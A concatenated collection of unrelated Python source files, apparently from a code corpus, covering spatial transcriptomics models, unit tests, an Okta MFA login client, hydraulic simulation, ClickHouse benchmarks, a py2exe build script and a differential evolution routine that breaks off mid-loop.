def show_destroy_cv2(img, win_name=''):
import cv2
try:
cv2.imshow(win_name, img)
cv2.waitKey(0)
cv2.destroyWindow(win_name)
except Exception as e:
cv2.destroyWindow(win_name)
raise e
|
1619111
|
import logging
from typing import Optional, Tuple, Union
import numpy as np
import pandas as pd
import torch
from anndata import AnnData
from scvi import REGISTRY_KEYS
from scvi._compat import Literal
from scvi.data import AnnDataManager
from scvi.data.fields import CategoricalObsField, LayerField, NumericalObsField
from scvi.external.stereoscope._module import RNADeconv, SpatialDeconv
from scvi.model.base import BaseModelClass, UnsupervisedTrainingMixin
from scvi.utils import setup_anndata_dsp
logger = logging.getLogger(__name__)
class RNAStereoscope(UnsupervisedTrainingMixin, BaseModelClass):
"""
Reimplementation of Stereoscope [Andersson20]_ for deconvolution of spatial transcriptomics from single-cell transcriptomics.
https://github.com/almaan/stereoscope.
Parameters
----------
sc_adata
single-cell AnnData object that has been registered via :meth:`~scvi.external.RNAStereoscope.setup_anndata`.
**model_kwargs
Keyword args for :class:`~scvi.external.stereoscope.RNADeconv`
Examples
--------
>>> sc_adata = anndata.read_h5ad(path_to_sc_anndata)
>>> scvi.external.RNAStereoscope.setup_anndata(sc_adata, labels_key="labels")
>>> stereo = scvi.external.stereoscope.RNAStereoscope(sc_adata)
>>> stereo.train()
"""
def __init__(
self,
sc_adata: AnnData,
**model_kwargs,
):
super(RNAStereoscope, self).__init__(sc_adata)
self.n_genes = self.summary_stats.n_vars
self.n_labels = self.summary_stats.n_labels
# first we have the scRNA-seq model
self.module = RNADeconv(
n_genes=self.n_genes,
n_labels=self.n_labels,
**model_kwargs,
)
self._model_summary_string = (
"RNADeconv Model with params: \nn_genes: {}, n_labels: {}"
).format(
self.n_genes,
self.n_labels,
)
self.init_params_ = self._get_init_params(locals())
def train(
self,
max_epochs: int = 400,
lr: float = 0.01,
use_gpu: Optional[Union[str, int, bool]] = None,
train_size: float = 1,
validation_size: Optional[float] = None,
batch_size: int = 128,
plan_kwargs: Optional[dict] = None,
**kwargs,
):
"""
Trains the model using MAP inference.
Parameters
----------
max_epochs
Number of epochs to train for
lr
Learning rate for optimization.
use_gpu
Use default GPU if available (if None or True), or index of GPU to use (if int),
or name of GPU (if str, e.g., `'cuda:0'`), or use CPU (if False).
train_size
Size of training set in the range [0.0, 1.0].
validation_size
Size of the test set. If `None`, defaults to 1 - `train_size`. If
`train_size + validation_size < 1`, the remaining cells belong to a test set.
batch_size
Minibatch size to use during training.
plan_kwargs
Keyword args for :class:`~scvi.train.TrainingPlan`. Keyword arguments passed to
`train()` will overwrite values present in `plan_kwargs`, when appropriate.
**kwargs
Other keyword args for :class:`~scvi.train.Trainer`.
"""
update_dict = {
"lr": lr,
}
if plan_kwargs is not None:
plan_kwargs.update(update_dict)
else:
plan_kwargs = update_dict
super().train(
max_epochs=max_epochs,
use_gpu=use_gpu,
train_size=train_size,
validation_size=validation_size,
batch_size=batch_size,
plan_kwargs=plan_kwargs,
**kwargs,
)
@classmethod
@setup_anndata_dsp.dedent
def setup_anndata(
cls,
adata: AnnData,
labels_key: Optional[str] = None,
layer: Optional[str] = None,
**kwargs,
):
"""
%(summary)s.
Parameters
----------
%(param_labels_key)s
%(param_layer)s
"""
setup_method_args = cls._get_setup_method_args(**locals())
anndata_fields = [
LayerField(REGISTRY_KEYS.X_KEY, layer, is_count_data=True),
CategoricalObsField(REGISTRY_KEYS.LABELS_KEY, labels_key),
]
adata_manager = AnnDataManager(
fields=anndata_fields, setup_method_args=setup_method_args
)
adata_manager.register_fields(adata, **kwargs)
cls.register_manager(adata_manager)
class SpatialStereoscope(UnsupervisedTrainingMixin, BaseModelClass):
"""
Reimplementation of Stereoscope [Andersson20]_ for deconvolution of spatial transcriptomics from single-cell transcriptomics.
https://github.com/almaan/stereoscope.
Parameters
----------
st_adata
spatial transcriptomics AnnData object that has been registered via :meth:`~scvi.external.SpatialStereoscope.setup_anndata`.
sc_params
parameters of the model learned from the single-cell RNA seq data for deconvolution.
cell_type_mapping
numpy array mapping for the cell types used in the deconvolution
prior_weight
how to reweight the minibatches for stochastic optimization. "n_obs" is the valid
procedure, "minibatch" is the procedure implemented in Stereoscope.
**model_kwargs
Keyword args for :class:`~scvi.external.stereoscope.SpatialDeconv`
Examples
--------
>>> sc_adata = anndata.read_h5ad(path_to_sc_anndata)
>>> scvi.external.RNAStereoscope.setup_anndata(sc_adata, labels_key="labels")
>>> sc_model = scvi.external.stereoscope.RNAStereoscope(sc_adata)
>>> sc_model.train()
>>> st_adata = anndata.read_h5ad(path_to_st_anndata)
>>> scvi.external.SpatialStereoscope.setup_anndata(st_adata)
>>> stereo = scvi.external.stereoscope.SpatialStereoscope.from_rna_model(st_adata, sc_model)
>>> stereo.train()
>>> st_adata.obsm["deconv"] = stereo.get_proportions()
Notes
-----
See further usage examples in the following tutorials:
1. :doc:`/user_guide/notebooks/stereoscope_heart_LV_tutorial`
"""
def __init__(
self,
st_adata: AnnData,
sc_params: Tuple[np.ndarray],
cell_type_mapping: np.ndarray,
prior_weight: Literal["n_obs", "minibatch"] = "n_obs",
**model_kwargs,
):
super().__init__(st_adata)
self.module = SpatialDeconv(
n_spots=st_adata.n_obs,
sc_params=sc_params,
prior_weight=prior_weight,
**model_kwargs,
)
self._model_summary_string = (
"RNADeconv Model with params: \nn_spots: {}"
).format(
st_adata.n_obs,
)
self.cell_type_mapping = cell_type_mapping
self.init_params_ = self._get_init_params(locals())
@classmethod
def from_rna_model(
cls,
st_adata: AnnData,
sc_model: RNAStereoscope,
prior_weight: Literal["n_obs", "minibatch"] = "n_obs",
layer: Optional[str] = None,
**model_kwargs,
):
"""
Alternate constructor for exploiting a pre-trained model on RNA-seq data.
Parameters
----------
st_adata
registered anndata object
sc_model
trained RNADeconv model
prior_weight
how to reweight the minibatches for stochastic optimization. "n_obs" is the valid
procedure, "minibatch" is the procedure implemented in Stereoscope.
layer
if not `None`, uses this as the key in `adata.layers` for raw count data.
**model_kwargs
Keyword args for :class:`~scvi.external.SpatialDeconv`
"""
cls.setup_anndata(st_adata, layer=layer)
return cls(
st_adata,
sc_model.module.get_params(),
sc_model.adata_manager.get_state_registry(
REGISTRY_KEYS.LABELS_KEY
).categorical_mapping,
prior_weight=prior_weight,
**model_kwargs,
)
def get_proportions(self, keep_noise=False) -> pd.DataFrame:
"""
Returns the estimated cell type proportion for the spatial data.
Shape is n_cells x n_labels OR n_cells x (n_labels + 1) if keep_noise
Parameters
----------
keep_noise
whether to account for the noise term as a standalone cell type in the proportion estimate.
"""
self._check_if_trained()
column_names = self.cell_type_mapping
if keep_noise:
column_names = np.append(column_names, "noise_term")
return pd.DataFrame(
data=self.module.get_proportions(keep_noise),
columns=column_names,
index=self.adata.obs.index,
)
def get_scale_for_ct(
self,
y: np.ndarray,
) -> np.ndarray:
r"""
Calculate the cell type specific expression.
Parameters
----------
y
numpy array containing the list of cell types
Returns
-------
gene_expression
"""
self._check_if_trained()
ind_y = np.array([np.where(ct == self.cell_type_mapping)[0][0] for ct in y])
if ind_y.shape != y.shape:
raise ValueError(
"Incorrect shape after matching cell types to reference mapping. Please check cell type query."
)
px_scale = self.module.get_ct_specific_expression(torch.tensor(ind_y)[:, None])
return np.array(px_scale.cpu())
def train(
self,
max_epochs: int = 400,
lr: float = 0.01,
use_gpu: Optional[Union[str, int, bool]] = None,
batch_size: int = 128,
plan_kwargs: Optional[dict] = None,
**kwargs,
):
"""
Trains the model using MAP inference.
Parameters
----------
max_epochs
Number of epochs to train for
lr
Learning rate for optimization.
use_gpu
Use default GPU if available (if None or True), or index of GPU to use (if int),
or name of GPU (if str, e.g., `'cuda:0'`), or use CPU (if False).
batch_size
Minibatch size to use during training.
plan_kwargs
Keyword args for :class:`~scvi.train.TrainingPlan`. Keyword arguments passed to
`train()` will overwrite values present in `plan_kwargs`, when appropriate.
**kwargs
Other keyword args for :class:`~scvi.train.Trainer`.
"""
update_dict = {
"lr": lr,
}
if plan_kwargs is not None:
plan_kwargs.update(update_dict)
else:
plan_kwargs = update_dict
super().train(
max_epochs=max_epochs,
use_gpu=use_gpu,
train_size=1,
validation_size=None,
batch_size=batch_size,
plan_kwargs=plan_kwargs,
**kwargs,
)
@classmethod
@setup_anndata_dsp.dedent
def setup_anndata(
cls,
adata: AnnData,
layer: Optional[str] = None,
**kwargs,
):
"""
%(summary)s.
Parameters
----------
%(param_layer)s
"""
setup_method_args = cls._get_setup_method_args(**locals())
# add index for each cell (provided to pyro plate for correct minibatching)
adata.obs["_indices"] = np.arange(adata.n_obs)
anndata_fields = [
LayerField(REGISTRY_KEYS.X_KEY, layer, is_count_data=True),
NumericalObsField(REGISTRY_KEYS.INDICES_KEY, "_indices"),
]
adata_manager = AnnDataManager(
fields=anndata_fields, setup_method_args=setup_method_args
)
adata_manager.register_fields(adata, **kwargs)
cls.register_manager(adata_manager)
|
1619176
|
import unittest
from fluentcheck.classes import Check
from fluentcheck.exceptions import CheckError
class TestDictsAssertions(unittest.TestCase):
def test_is_dict(self):
res = Check({}).is_dict()
self.assertIsInstance(res, Check)
try:
Check(123).is_dict()
self.fail()
except CheckError:
pass
def test_is_not_dict(self):
res = Check(set()).is_not_dict()
self.assertIsInstance(res, Check)
try:
Check({}).is_not_dict()
self.fail()
except CheckError:
pass
def test_has_keys(self):
d = { 1: 'one', 2: 'two'}
res = Check(d).has_keys(1,2)
self.assertIsInstance(res, Check)
try:
Check(d).has_keys(3,4)
self.fail()
except CheckError:
pass
def test_has_not_keys(self):
d = { 1: 'one', 2: 'two'}
res = Check(d).has_not_keys(3,4)
self.assertIsInstance(res, Check)
try:
Check(d).has_not_keys(1,2)
self.fail()
except CheckError:
pass
|
1619217
|
import heapq
"""
Definition of Interval.
class Interval(object):
def __init__(self, start, end):
self.start = start
self.end = end
"""
class Solution:
"""
@param intervals: the given k sorted interval lists
@return: the new sorted interval list
"""
def mergeKSortedIntervalLists(self, intervals):
# write your code here
if not intervals or len(intervals) == 0:
return intervals
heap, merged = [], []
for idx, interval in enumerate(intervals):
if interval:
heapq.heappush(heap, (interval[0].start, interval[0].end, idx, 0))
while heap:
start, end, idx1, idx2 = heap[0]
heapq.heappop(heap)
if len(merged) == 0 or merged[-1].end < start:
merged.append(Interval(start, end))
else:
merged[-1].end = max(merged[-1].end, end)
if idx2 + 1 < len(intervals[idx1]):
heapq.heappush(heap, (intervals[idx1][idx2 + 1].start, intervals[idx1][idx2 + 1].end, idx1, idx2 + 1))
return merged
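# Hedged usage sketch: merging two sorted interval lists with the heap-based
# k-way merge above. Interval is the class described in the docstring at the
# top of this file; the values are illustrative only.
#
# lists = [
#     [Interval(1, 3), Interval(4, 7)],
#     [Interval(2, 5), Interval(8, 10)],
# ]
# merged = Solution().mergeKSortedIntervalLists(lists)
# # -> two intervals covering [1, 7] and [8, 10]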
|
1619381
|
import time
import sys
from urllib.parse import parse_qs
from urllib.parse import urlparse
from oktaawscli.version import __version__
class OktaAuthMfaApp():
""" Handles per-app Okta MFA """
def __init__(self, logger, session, verify_ssl, auth_url):
self.session = session
self.logger = logger
self._verify_ssl_certs = verify_ssl
self._preferred_mfa_type = None
self._mfa_code = None
self._auth_url = auth_url
def stepup_auth(self, embed_link, state_token=None):
""" Login to Okta using the Step-up authentication flow"""
flow_state = self._get_initial_flow_state(embed_link, state_token)
while flow_state.get('apiResponse').get('status') != 'SUCCESS':
flow_state = self._next_login_step(
flow_state.get('stateToken'), flow_state.get('apiResponse'))
return flow_state['apiResponse']
def _next_login_step(self, state_token, login_data):
""" decide what the next step in the login process is"""
if 'errorCode' in login_data:
self.logger.error("LOGIN ERROR: {} | Error Code: {}".format(login_data['errorSummary'], login_data['errorCode']))
sys.exit(2)
status = login_data['status']
if status == 'UNAUTHENTICATED':
self.logger.error("You are not authenticated -- please try to log in again")
sys.exit(2)
elif status == 'LOCKED_OUT':
self.logger.error("Your Okta access has been locked out due to failed login attempts.")
sys.exit(2)
elif status == 'MFA_ENROLL':
self.logger.error("You must enroll in MFA before using this tool.")
sys.exit(2)
elif status == 'MFA_REQUIRED':
return self._login_multi_factor(state_token, login_data)
elif status == 'MFA_CHALLENGE':
if 'factorResult' in login_data and login_data['factorResult'] == 'WAITING':
return self._check_push_result(state_token, login_data)
else:
return self._login_input_mfa_challenge(state_token, login_data['_links']['next']['href'])
else:
raise RuntimeError('Unknown login status: ' + status)
def _get_initial_flow_state(self, embed_link, state_token=None):
""" Starts the authentication flow with Okta"""
if state_token is None:
response = self.session.get(
embed_link, allow_redirects=False)
url_parse_results = urlparse(response.headers['Location'])
state_token = parse_qs(url_parse_results.query)['stateToken'][0]
response = self.session.post(
self._auth_url,
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
return {'stateToken': state_token, 'apiResponse': response.json()}
def _get_headers(self):
return {
'User-Agent': "okta-awscli/%s" % __version__,
'Accept': 'application/json',
'Content-Type': 'application/json'
}
def _choose_factor(self, factors):
""" gets a list of available authentication factors and
asks the user to select the factor they want to use """
print("Multi-factor Authentication required for application.")
# filter the factor list down to just the types specified in preferred_mfa_type
if self._preferred_mfa_type is not None:
factors = list(filter(lambda item: item['factorType'] == self._preferred_mfa_type, factors))
if len(factors) == 1:
factor_name = self._build_factor_name(factors[0])
self.logger.info("%s selected" % factor_name)
selection = 0
else:
print("Pick a factor:")
# print out the factors and let the user select
for i, factor in enumerate(factors):
factor_name = self._build_factor_name(factor)
if factor_name:
print('[ %d ] %s' % (i, factor_name))
selection = input("Selection: ")
# make sure the choice is valid
if int(selection) >= len(factors):
self.logger.error("You made an invalid selection")
sys.exit(1)
return factors[int(selection)]
@staticmethod
def _build_factor_name(factor):
""" Build the display name for a MFA factor based on the factor type"""
if factor['factorType'] == 'push':
return "Okta Verify App: " + factor['profile']['deviceType'] + ": " + factor['profile']['name']
elif factor['factorType'] == 'sms':
return factor['factorType'] + ": " + factor['profile']['phoneNumber']
elif factor['factorType'] == 'call':
return factor['factorType'] + ": " + factor['profile']['phoneNumber']
elif factor['factorType'] == 'token:software:totp':
return factor['factorType'] + "( " + factor['provider'] + " ) : " + factor['profile']['credentialId']
elif factor['factorType'] == 'token':
return factor['factorType'] + ": " + factor['profile']['credentialId']
else:
return "Unknown MFA type: " + factor['factorType']
def _login_send_sms(self, state_token, factor):
""" Send SMS message for second factor authentication"""
response = self.session.post(
factor['_links']['verify']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
self.logger.info("A verification code has been sent to " + factor['profile']['phoneNumber'])
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_send_call(self, state_token, factor):
""" Send Voice call for second factor authentication"""
response = self.session.post(
factor['_links']['verify']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
self.logger.info("You should soon receive a phone call at " + factor['profile']['phoneNumber'])
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_send_push(self, state_token, factor):
""" Send 'push' for the Okta Verify mobile app """
response = self.session.post(
factor['_links']['verify']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
self.logger.info("Okta Verify push sent...")
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_multi_factor(self, state_token, login_data):
""" handle multi-factor authentication with Okta"""
factor = self._choose_factor(login_data['_embedded']['factors'])
if factor['factorType'] == 'sms':
return self._login_send_sms(state_token, factor)
elif factor['factorType'] == 'call':
return self._login_send_call(state_token, factor)
elif factor['factorType'] == 'token:software:totp':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
elif factor['factorType'] == 'token':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
elif factor['factorType'] == 'push':
return self._login_send_push(state_token, factor)
def _login_input_mfa_challenge(self, state_token, next_url):
""" Submit verification code for SMS or TOTP authentication methods"""
pass_code = self._mfa_code
if pass_code is None:
pass_code = input("Enter MFA verification code: ")
response = self.session.post(
next_url,
json={'stateToken': state_token, 'passCode': pass_code},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def _check_push_result(self, state_token, login_data):
""" Check Okta API to see if the push request has been responded to"""
time.sleep(1)
response = self.session.post(
login_data['_links']['next']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
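# Hedged usage sketch (not part of the original module): the class is driven by
# calling stepup_auth() with an app embed link; it loops through Okta's MFA
# states until the API reports SUCCESS. The session, logger and URLs below are
# placeholders.
#
# import logging, requests
# mfa = OktaAuthMfaApp(logging.getLogger(__name__), requests.Session(), True,
#                      "https://example.okta.com/api/v1/authn")
# api_response = mfa.stepup_auth("https://example.okta.com/home/exampleapp/abc/123")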
|
1619476
|
from __future__ import absolute_import
from django.views.generic import View
from raven.contrib.django.models import client
from sentry.web.frontend.error_500 import Error500View
class DebugTriggerErrorView(View):
def get(self, request):
try:
raise ValueError('An example error')
except Exception:
client.captureException(request=request)
return Error500View.as_view()(request)
|
1619484
|
from common.constant import StatusCode, ResponseStatus
from common.logger import get_logger
from common.repository import Repository
from common.utils import Utils, handle_exception_with_slack_notification, generate_lambda_response, make_response_body
from wallets.config import NETWORKS, NETWORK_ID, SLACK_HOOK
from wallets.service.wallet_service import WalletService
NETWORKS_NAME = dict((NETWORKS[netId]['name'], netId) for netId in NETWORKS.keys())
repo = Repository(net_id=NETWORK_ID, NETWORKS=NETWORKS)
utils = Utils()
logger = get_logger(__name__)
wallet_service = WalletService(repo=repo)
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def delete_user_wallet(event, context):
query_parameters = event["queryStringParameters"]
username = query_parameters["username"]
wallet_service.remove_user_wallet(username)
return generate_lambda_response(StatusCode.CREATED, make_response_body(
ResponseStatus.SUCCESS, "OK", {}
), cors_enabled=False)
|
1619487
|
import os.path
import sys
import anuga
from anuga import myid, numprocs, finalize, barrier
from anuga import Inlet_operator, Boyd_box_operator
"""
This test exercises the parallel culvert
"""
verbose = True
length = 40.
width = 16.
dx = dy = 2 # Resolution: Length of subdivisions on both axes
#----------------------------------------------------------------------
# Setup initial conditions
#----------------------------------------------------------------------
def topography(x, y):
"""Set up a weir
A culvert will connect either side
"""
# General Slope of Topography
z=-x/1000
N = len(x)
for i in range(N):
# Sloping Embankment Across Channel
if 5.0 < x[i] < 10.1:
# Cut Out Segment for Culvert face
if 1.0+(x[i]-5.0)/5.0 < y[i] < 4.0 - (x[i]-5.0)/5.0:
z[i]=z[i]
else:
z[i] += 0.5*(x[i] -5.0) # Sloping Segment U/S Face
if 10.0 < x[i] < 12.1:
z[i] += 2.5 # Flat Crest of Embankment
if 12.0 < x[i] < 14.5:
# Cut Out Segment for Culvert face
if 2.0-(x[i]-12.0)/2.5 < y[i] < 3.0 + (x[i]-12.0)/2.5:
z[i]=z[i]
else:
z[i] += 2.5-1.0*(x[i] -12.0) # Sloping D/S Face
return z
##-----------------------------------------------------------------------
## Setup domain
##-----------------------------------------------------------------------
if myid == 0:
points, vertices, boundary = anuga.rectangular_cross(int(length/dx),
int(width/dy),
len1=length,
len2=width)
domain = anuga.Domain(points, vertices, boundary)
domain.set_name() # Output name output_script_name.sww
#domain.set_flow_algorithm('1_5')
else:
domain = None
##-----------------------------------------------------------------------
## Distribute domain
##-----------------------------------------------------------------------
domain = anuga.distribute(domain)
#domain.dump_triangulation("run_parallel_boyd_box_op_domain.png")
##-----------------------------------------------------------------------
## Setup boundary conditions
##-----------------------------------------------------------------------
domain.set_quantity('elevation', topography)
domain.set_quantity('friction', 0.01) # Constant friction
domain.set_quantity('stage',
expression='elevation') # Dry initial condition
Bi = anuga.Dirichlet_boundary([5.0, 0.0, 0.0])
Br = anuga.Reflective_boundary(domain) # Solid reflective wall
domain.set_boundary({'left': Br, 'right': Br, 'top': Br, 'bottom': Br})
################ Define Fractional Operators ##########################
line0 = [[10.0, 10.0], [30.0, 10.0]]
#line0 = [[29.0, 10.0], [30.0, 10.0]]
poly1 = [[0.0, 10.0], [0.0, 15.0], [5.0, 15.0], [5.0, 10.0]]
Q0 = anuga.file_function('data/test_hydrograph.tms', quantities=['hydrograph'])
Q1 = 5.0
samples = 50
inlet0 = None
inlet1 = None
boyd_box0 = None
inlet0 = Inlet_operator(domain, line0, Q0, logging=True, description='inlet0', verbose = False)
inlet1 = Inlet_operator(domain, poly1, Q1, logging=True, description='inlet1', verbose = False)
# Enquiry point [ 19. 2.5] is contained in two domains in 4 proc case
boyd_box0 = Boyd_box_operator(domain,
end_points=[[9.0, 2.5],[19.0, 2.5]],
losses=1.5,
width=5.0,
apron=5.0,
use_momentum_jet=True,
use_velocity_head=False,
manning=0.013,
logging=True,
description='boyd_box_0',
verbose=False)
#if inlet0 is not None and verbose: inlet0.print_statistics()
#if inlet1 is not None and verbose: inlet1.print_statistics()
#if boyd_box0 is not None and verbose: boyd_box0.print_statistics()
sys.stdout.flush()
barrier()
##-----------------------------------------------------------------------
## Evolve system through time
##-----------------------------------------------------------------------
for t in domain.evolve(yieldstep = 2.0, finaltime = 20.0):
if verbose:
domain.write_time()
sys.stdout.flush()
#print domain.volumetric_balance_statistics()
barrier()
stage = domain.get_quantity('stage')
if boyd_box0 is not None and verbose :
#print myid
boyd_box0.print_timestepping_statistics()
sys.stdout.flush()
#for i in range(samples):
# if tri_ids[i] >= 0:
# if verbose: print 'P%d tri %d, value = %s' %(myid, i, stage.centroid_values[tri_ids[i]])
barrier()
##-----------------------------------------------------------------------
## Assign/Test Control data
##-----------------------------------------------------------------------
domain.sww_merge(delete_old=True)
finalize()
|
1619501
|
import os
from pathlib import Path
from unittest import mock
@mock.patch("click.get_app_dir", autospec=True)
def test_new_config(gad, tmp_path: Path, monkeypatch):
# TODO - is there a way to run this within the normal test framework, i.e. perhaps unloading/reloading datapane module so we can
# setup our mocks/patches first?
# patch the config file path and no_analytics
gad.return_value = str(tmp_path)
monkeypatch.chdir(tmp_path)
with mock.patch("datapane.client.analytics.posthog", autospec=True) as posthog, mock.patch(
"datapane.client.analytics._NO_ANALYTICS", False
), mock.patch("datapane.client.api.user.ping", autospect=True) as ping:
ping.return_value = "joebloggs"
from datapane.client import config as c
# check pre-invariants
assert c.config.version == 3
assert c.config.username == ""
assert not c.config.completed_action
assert posthog.identify.call_count == 0
assert posthog.capture.call_count == 0
# run login event
import datapane as dp
from datapane.client import config as c
username = dp.login(token="TOKEN")
assert username == "joebloggs"
# check config file
assert c.config.version == 3
assert c.config.username == "joebloggs"
assert c.config.completed_action
# check analytics
assert posthog.identify.call_count == 1
assert posthog.capture.call_count == 2
# load and check config file
_config = c.Config.load()
assert c.config.version == 3
assert _config.username == "joebloggs"
assert _config.completed_action
# run additional event
# depends on fe-components - only run locally
if "CI" not in os.environ:
from tests.client.local.api.test_reports import gen_report_simple
report = gen_report_simple()
report.save(path="test_out.html", name="My Wicked Report", author="<NAME>")
assert posthog.identify.call_count == 1
assert posthog.capture.call_count == 3
|
1619521
|
import taichi as ti
import numpy as np
A = np.array([
[0, 1, 0],
[1, 0, 1],
[0, 1, 0],
])
def conv(A, B):
m, n = A.shape
s, t = B.shape
C = np.zeros((m + s - 1, n + t - 1), dtype=A.dtype)
for i in range(m):
for j in range(n):
for k in range(s):
for l in range(t):
C[i + k, j + l] += A[i, j] * B[k, l]
return C
B = A
print(B)
B = conv(B, A)
print(B)
B = conv(B, A)
print(B)
B = conv(B, A)
print(B)
|
1619522
|
import distutils.core, shutil, os, py2exe, subprocess, re, platform
def grepimports(dir):
""" grep imports from first line of python files in given folder """
imports = set()
IMPORT_ = 'import '
for f in os.listdir(dir):
p = os.path.join(dir, f)
if not p.endswith("py"): continue
for line in open(p):
if line.startswith(IMPORT_):
for i in line[len(IMPORT_):].split(','):
imports.add(i.strip())
break
return list(imports)
# check revision
svnversion = 'XXX'
try:
svnversion = subprocess.check_output("svnversion").decode().strip()
except:
print("Failed to determine revision - is svnversion in path?")
pass
try:
svnversion = int(svnversion)
print("Source @ revision %s" % svnversion)
except:
svnversion = svnversion.replace(':', '-')
print("Source @ modified revision %s" % svnversion)
arch = platform.architecture()[0]
# clean up
shutil.rmtree(os.path.join("build", arch), True)
# calculate extra files
def make_data_files(roots):
data = []
for root in roots:
if os.path.isdir(root):
for dirpath, dirnames, filenames in os.walk(root, True, None, False):
if filenames:
data.append( (dirpath, [os.path.join(dirpath, f) for f in filenames if not '.pyc' in f]) )
if '__pycache__' in dirnames:
dirnames.remove('__pycache__')
if '.svn' in dirnames:
dirnames.remove('.svn')
else:
data.append( ('', [root]) )
return data
dist = os.path.join("build", arch , "dist")
options = {
"dist_dir": dist,
"includes": grepimports('modules'),
"excludes" : [],
"dll_excludes": ["w9xpopen.exe"],
"packages": []
}
data_files = make_data_files(['contrib', 'modules', 'scripts', 'simscript.ico'])
simscript = {'script':'simscript.py', 'dest_base':'simscript', 'icon_resources':[(1,"simscript.ico")]}
tail = {'script':'tail.py'}
distutils.core.setup(console=[tail], windows=[simscript], options={'py2exe' :options}, data_files=data_files)
shutil.make_archive('build/simscript-%s-r%s' % (arch, svnversion), 'zip', dist, '.')
|
1619575
|
from clickhouse_driver import Client
import datetime
import pytz
import os
import time
import sys
from urllib.parse import urlparse
url = os.environ.get('DATABASE_URL',"tcp://default@localhost/default?compression=lz4")
url = urlparse(url)._replace(scheme='clickhouse').geturl()
client = Client.from_url(url)
ddl = ("CREATE TABLE IF NOT EXISTS perf_py ("
"id UInt32,"
"name String,"
"dt DateTime "
") Engine=MergeTree PARTITION BY name ORDER BY dt")
client.execute("DROP TABLE IF EXISTS perf_py")
client.execute( ddl )
NAMES = ["one","two","three","four","five"];
BSIZE = 10000
CIRCLE = 1000
def next_block(i):
now = datetime.datetime.now()
sec = datetime.timedelta(seconds=1)
block = []
for i in range(BSIZE):
block.append([i, NAMES[ i % len(NAMES) ], now + i * sec ] )
return block
def select_perf():
start_time = time.time_ns()
settings = {'max_block_size': 100000}
    rows = client.execute_iter("SELECT * FROM perf_py", settings=settings)
for row in rows:
pass
print("elapsed %s msec" % ( (time.time_ns() - start_time)/1000000 ))
def insert_perf():
start_time = time.time_ns()
for i in range(0,CIRCLE):
client.execute('INSERT INTO perf_py (id, name, dt) VALUES', next_block(i) )
print("elapsed %s msec" % ( (time.time_ns() - start_time)/1000000 ))
if __name__ == "__main__":
if len( sys.argv )<2:
print("specify perf test. 'insert' or 'select'. bench.py <name>.")
sys.exit(1)
perf_name = sys.argv[1]
f = globals()[ perf_name + "_perf" ]
f()
|
1619619
|
import numpy as np
def differential_evolution(fobj, bounds, mut=0.8, crossprob=0.7, popsize=30, gens=1000, mode='best/1'):
# Gets number of parameters (length of genome vector)
num_params = len(bounds)
# Initializes the population genomes with values drawn from uniform distribution in the range [0,1]
pop = np.random.rand(popsize, num_params)
# Gets the boundaries for each parameter to scale the population genomes
min_b, max_b = np.asarray(bounds).T
# Scales the population genomes from the range [0,1] to the range specified by the parameter boundaries
diff = np.fabs(min_b - max_b)
pop_scaled = min_b + pop * diff
# Evaluates fitness for each individual in the population by calculating the objective to minimize
unfitness = np.asarray([fobj(ind) for ind in pop_scaled])
# Gets the best individual of the population
best_idx = np.argmin(unfitness)
best = pop_scaled[best_idx]
for i in range(gens):
print('Best unfitness in generation %d: %f' % (i + 1, unfitness[best_idx]))
# For each individual:
for j in range(popsize):
            # Selects donor individuals from the population (different from the current one) for mutation
if mode == 'best/1':
idxs = [idx for idx in range(popsize) if (idx != j and idx != best_idx)]
                a = pop[best_idx]  # use the best individual in normalized [0, 1] coordinates
b, c = pop[np.random.choice(idxs, 2, replace=False)]
mutant = np.clip(a + mut * (b - c), 0, 1)
elif mode == 'best/2':
idxs = [idx for idx in range(popsize) if (idx != j and idx != best_idx)]
                a = pop[best_idx]  # use the best individual in normalized [0, 1] coordinates
b, c, d, e = pop[np.random.choice(idxs, 4, replace=False)]
# Generates a mutant by applying the differential mutation (and clips to keep in range [0,1])
mutant = np.clip(a + mut * (b - c + d - e), 0, 1)
elif mode == 'rand/1':
idxs = [idx for idx in range(popsize) if idx != j]
a, b, c = pop[np.random.choice(idxs, 3, replace=False)]
# Generates a mutant by applying the differential mutation (and clips to keep in range [0,1])
mutant = np.clip(a + mut * (b - c), 0, 1)
elif mode == 'rand/2':
idxs = [idx for idx in range(popsize) if idx != j]
a, b, c, d, e = pop[np.random.choice(idxs, 5, replace=False)]
# Generates a mutant by applying the differential mutation (and clips to keep in range [0,1])
mutant = np.clip(a + mut * (b - c + d - e), 0, 1)
# Selects parameters of the individual to crossover with the mutant with the probability of crossover
cross_points = np.random.rand(num_params) < crossprob
            # If no parameter was selected for crossover ...
if not np.any(cross_points):
